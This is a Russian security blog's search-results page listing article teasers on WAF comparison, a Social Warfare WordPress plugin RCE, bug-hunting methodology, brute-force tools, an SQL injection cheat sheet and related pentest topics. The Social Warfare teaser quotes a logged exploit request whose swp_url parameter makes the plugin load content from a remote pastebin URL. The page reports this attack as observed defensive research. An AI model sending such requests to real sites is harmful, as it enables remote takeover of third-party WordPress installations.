test | Результаты поиска | DefconRU

27.05.2019 @ 22:57 Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free

naxsi, Nemesida WAF, Pentestit, SQL injection, WAF, WAF bypass, web security, XSS

Сегодня мы хотим протестировать и сравнить работу двух бесплатных WAF: NAXSI и Nemesida WAF Free. В сравнении будут учитываться простота использования, качество предустановленных сигнатур, количество пропусков атак и частота ложных срабатываний.

NAXSI расшифровывается как Nginx Anti XSS & SQL Injection. Работает по принципу: всё, что не разрешено — запрещено. Каждый HTTP-запрос (GET|PUT|POST) проверяется на соответствие шаблонам запрещающих правил, заданных по умолчанию в файле naxsi_core.rules. Эти правила охватывают 99% всех возможных вариантов зловредных запросов. Например, по умолчанию запрещены все запросы, в URI которых содержится символ двойной кавычки. Если для нормальной работы приложения такой символ необходим, то вручную нужно внести соответствующие исключения в белый список. Но есть и обратная сторона медали — если разрешающие правила будут проработаны плохо, то NAXSI будет блокировать еще и часть легитимных запросов. Поэтому ответственность за конечный результат разработчики модуля целиком и полностью возлагают на администратора системы. Как и большинство модулей для Nginx, NAXSI из репозитория недоступен, поэтому его придется вручную скачивать и компилировать.

Nemesida WAF Free — бесплатная версия Nemesida WAF, представляющая собой динамический модуль для Nginx и обеспечивающая базовую защиту веб-приложения от атак класса OWASP на основе сигнатурного метода.

Отличительной особенностью Nemesida WAF Free является собственная база сигнатур, выявляющая атаки на веб-приложения при минимальном количестве ложных срабатываний, а также:

минимальные требования к аппаратным ресурсам;

обновление из репозитория;

установка и настройка за несколько минут;

обработка содержимого всех типов HTTP-запроса;

простота в обслуживании.

Читать далее Сравниваем бесплатные версии WAF: NAXSI vs Nemesida WAF Free →

03.04.2019 @ 13:30 Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare

Pentestit, RCE, Social Warfare, XSS

Статья носит информационный характер. Не нарушайте законодательство.

Некоторое время назад WAF зафиксировал атаку, которая имела следующий вид:
https://defcon.ru/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf

Из открытых источников мы узнали, что атака представляла собой попытку эксплуатации хранимой XSS уязвимости в Social Warfare — популярном WordpPress-плагине, установленном более чем на 70000 сайтов. Это показалось интересным и мы решили разобраться в уязвимости более детально.

Читать далее Как мы обнаружили RCE, пытаясь воспроизвести XSS в Social Warfare →

10.05.2017 @ 16:58 The Bug Hunters Methodology. Часть 2, 3.

bug-bounty, bug-hunter, Methodology, pentest, web security

The Bug Hunters Methodology: обнаружение цели и о составление карты архитектуры веб-приложения.

Предыдущие статьи:

Философия

Читать далее The Bug Hunters Methodology. Часть 2, 3. →

26.04.2017 @ 0:19 Kali Linux 2017.1

kali linux, Kali Linux 2017.1

Долгожданный релиз Kali Linux 2017.1!

Состоялся rolling-release Kali Linux 2017.1 , который содержит множество интересных обновлений и функций: обновленные пакеты , обновленное ядро, которое обеспечивает более качественную аппаратную поддержку, а также обновленные инструменты и нововведения.
Читать далее Kali Linux 2017.1 →

12.04.2017 @ 18:40 Port Scan Attack Detector (PSAD)

ids, IPS, psad

PSAD — представляет собой набор из трех легких системных демонов, которые работают на Linux и анализируют логи iptables для обнаружения сканирования портов и наличие подозрительного трафика.

Читать далее Port Scan Attack Detector (PSAD) →

27.02.2017 @ 14:13 Аудит Web-приложения – систематизируем тестирование

Methodology, pentest, web security

В предыдущей статье я рассмотрел методологию тестирования Web-приложения. Она не является обязательным стандартом, но поможет вам не пропустить уязвимости в больших проектах. Теперь я подробнее опишу каждый из этапов.

Читать далее Аудит Web-приложения – систематизируем тестирование →

27.01.2017 @ 14:57 Инструменты для проведения bruteforce-атак: hydra, medusa, patator

bruteforce, hydra, medusa, patator, подбор паролей

“Брутфорс (полный перебор, en brute force/Bruteforce, в обиходе просто брут) — метод «грубой силы» или «атака в лоб», перебор паролей, попытка подобрать пароль полным или частичным перебором. Специфика данного метода взлома состоит в том, что он не гарантирует успех подбора правильного пароля, однако процент достижения поставленной цели возрастает от количества паролей которые изначально заданы. Для этого существует несколько утилит — Hydra, Medusa, Patator.

Читать далее Инструменты для проведения bruteforce-атак: hydra, medusa, patator →

30.12.2016 @ 13:37 Прохождение Website Practical Hacking

CTF

Здравствуйте. В этой статье я рассмотрю площадку для тренировок в области web-хакинга “Practical Website Hacking”.

Читать далее Прохождение Website Practical Hacking →

19.10.2016 @ 16:20 Шпаргалка по SQL инъекциям

Microsoft SQL Server, MySQL, oracle, PostgreSQL, SQL injection, SQL injection cheat sheet

Шпаргалка по SQL-инъекциям создана для сводного описания технических особенностей различных типов уязвимостей SQL-injection. В статье представлены особенности проведения SQL-инъекций в MySQL, Microsoft SQL Server, ORACLE и PostgreSQL.

Читать далее Шпаргалка по SQL инъекциям →

19.10.2016 @ 16:06 Автоматизация использования поисковых систем

google dork, information gathering, recon, SCANNER-INURLBR

Вряд ли для кого то будет откровением что при неоднократном выполнении каких то повторяющиеся действий в конце концов хочется их автоматизировать чтобы высвободить время под более интересные занятия. Начальный сбор информации при проведении пентеста, в частности пассивный сбор информации, является одним из обязательных этапов, и хоть и дает простор для творчества, но по большей части представляет собой набор рутинных действий. К тому же автоматизация исключает возможность пропустить какие то проверки, что тоже не маловажно.

Читать далее Автоматизация использования поисковых систем →

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.